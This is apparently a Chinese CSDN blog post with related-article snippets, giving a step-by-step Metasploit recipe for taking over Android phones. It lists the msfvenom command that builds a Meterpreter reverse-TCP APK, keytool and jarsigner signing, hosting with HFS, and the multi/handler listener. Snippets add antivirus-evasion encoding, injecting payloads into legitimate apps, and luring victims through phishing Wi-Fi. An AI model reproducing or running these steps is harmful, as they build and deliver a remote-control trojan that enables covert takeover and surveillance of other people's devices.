msf生成安卓渗透

最新推荐文章于 2024-08-09 21:05:01 发布
最新推荐文章于 2024-08-09 21:05:01 发布
阅读量4.2k 收藏 11
点赞数 3
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a439017985/article/details/56830511
版权
这篇博客介绍了如何利用msf(Metasploit Framework)对Android设备进行渗透测试,包括生成恶意APK、签名、设置Payload并启动监听。同时,也提到了针对iOS设备的渗透方法,以及利用armitage工具进行攻击。还提到了二维码解析和短网址还原等技巧。
摘要由CSDN通过智能技术生成

利用msfhack android

1.msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -o test.apk

2.签名(可以不用)

1.keytool -genkey -v -keystore my-release-key.keystore -alias pentest -keyalg RSA -keysize 2048 -validity 10000

 

2.jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore pentest.apk pentest

 

3.jarsigner -verify -verbose -certs pentest.apk   

3.下载hfs server

4.wine hfs.exe

5.msfuse exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 10.10.10.128

set lport 4444

exploit

<
最低0.47元/天 解锁文章
a439017985
关注
专栏目录
MSF安卓手机渗透.md
12-07
MSF安卓手机渗透.md
利用MSF攻击Android
qq_45746768的博客
07-08 3866
利用Metasploit攻击Android
利用MSF打包加固APK对安卓手机进行控制
dl1286670932的博客
10-08 7375
由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。
安卓客户端渗透
最新发布
Time_worm的博客
08-09 923
安卓客户端渗透目前来说已经是CTF中一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成的。关于渗透思路,可以将payload注入到正常的apk中,构建一个钓鱼wifi,比如说设置一个没有密码的钓鱼wifi,需要下载软件才能正常上网,用户下载运行软件后即被远程控制。
更新Kali的Metasploit框架,这些过程千万不要踩雷
weixin_59086772的博客
02-24 4150
本篇文章为大家分享在更新kali的Metasploit框架过程中容易踩的坑,已帮各位实践,下次更新时可避免。 Kali就不做过多介绍了,初学者一般都知道它的作用,就简单介绍Metasploit是一款免费可下载的框架,通过它可以很容易地获取开发并针对软件漏洞尝试攻击,它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。 前言 不想升级一整个kali,就想把MSF框架更新一下,从版本5更新到把版本6 好家伙,不更新不知道,一更新直接呆住了,时间长不说还繁琐。 apt install metasploit
求教Kali Linux使用msf渗透安卓手机的问题
caojvrong的博客
05-14 151
求问csdn的大佬们,遇到这些问题该怎么解决qwq。被黑设备:红米note11 安卓12(权限都给了)
内网渗透系列之真实内网环境搭建
lza20001103的博客
09-04 1814
真实内网环境搭建 文章目录真实内网环境搭建前言靶机的准备后记 前言 最近学习了内网的一些知识,学会了域的创建,域渗透以及内网渗透方面的知识,这里就简单给大家介绍一下真实内网环境的搭建过程。 靶机的准备 这里需要5台机器,分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话,就需要3张网卡了,VM1,VM2,VM8,其中VM1和VM2是仅主机模式,VM8是NAT模式。 靶机的网卡设置如下: 网卡设置: kali(VM1)192.168.101.102
msf 渗透测试
06-05
4. **msfpayload & msfencode**: 结合使用可以生成并编码payload。 - 示例:生成一个编码后的Windows x64 Meterpreter反向TCP payload: ``` msfpayload windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
kali 渗透msf
11-14
kali渗透测试利器
远程控制目标主机
qq_38243607的博客
07-10 2102
目录 远程控制程序基础 实战:远程控制目标主机 工具使用 msfvenom msfconsole 远程控制程序基础 远程控制程序可以说是一个框架,指可以在一台设备上操纵另一台设备。它包括被控端和主控端,被控端是运行在目标主机上的程序,可以是一段代码也可以是一个直接执行的程序,含义上等同于木马;主控端在攻击机上执行。 根据主控端和被控端的连接方式,可以将远程控制软件分为正向和反向。 这里主要介绍一下反向控制,大部分的远程控制软件都采用远程控制的方式。当目标主机执行被控制端后...
Windows网络服务渗透测试实战-MSF恶意程序利用
c_lanxiaofang的博客
05-20 4195
一、实验项目名称 Windows网络服务渗透测试实战-MSF恶意程序利用 二、实验目的及要求 掌握对MSF恶意程序利用的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 对安卓msf上线进行图标隐藏,pc上线自行进行操作截图 一、Android端 1、查看kali的IP 192.168.43.89 2、生成一个apk文件到桌面 命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988 msfvenom -p and.
msf安卓远控木马版本不兼容
L125_的博客
01-25 973
关于msf安卓木马的问题,求大神看看
Kali安装AndroRAT及可能出现问题的解决方法(笔记)
weixin_60368484的博客
05-12 2288
安装AndroRAT时遇到的一些问题,发现网上竟然没有相关的帖子,在解决之后就做一份笔记吧,希望能帮到遇到相同问题的朋友。
使用msf工具对安卓手机进行渗透攻击———超详细
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
Android 免杀教程
zkaqlaoniao的博客
10-11 3658
免杀练习两年半VT检测 https://www.virustotal.com/gui/home/upload。
msf 免杀学习笔记-1】
qq_44637753的博客
12-29 1706
venom: payload+encoder msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.174.66 lport=4444 -b “\x00\x0ff” -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /var/www/html/hack.exe 参数: -p :指定需要使用的payload; LHOST:攻击机ip地址; LPORT:攻击
MSF初体验—入侵安卓手机
热门推荐
Banyan的博客
03-12 3万+
参考文章:http://www.cnblogs.com/hkleak/p/4852057.html 环境: windows8.1(装有pentestbox) IP:192.168.43.17 安卓手机一部(谷歌四儿子,安卓4.4.4)IP:192.168.43.152 在windwos控制台窗口用ipconfig查看本机IP 下面在启动pentestbox,因为我
msf生成捆绑安卓木马
05-27
在Metasploit中,可以使用以下步骤生成捆绑安卓木马: 1. 打开Metasploit控制台并输入以下命令启动msfvenom: ``` msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > <output file name>.apk ``` 2. 将`<your IP address>`替换为你的IP地址,将`<your port>`替换为用于与受害者通信的端口号,将`<output file name>`替换为生成的apk文件名。 3. 运行命令后,msfvenom会生成一个APK文件,其中包含与你指定的IP地址和端口号进行通信的Meterpreter反向Shell。 请注意,生成的捆绑安卓木马仅供授权渗透测试使用,未经授权的使用是非法的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值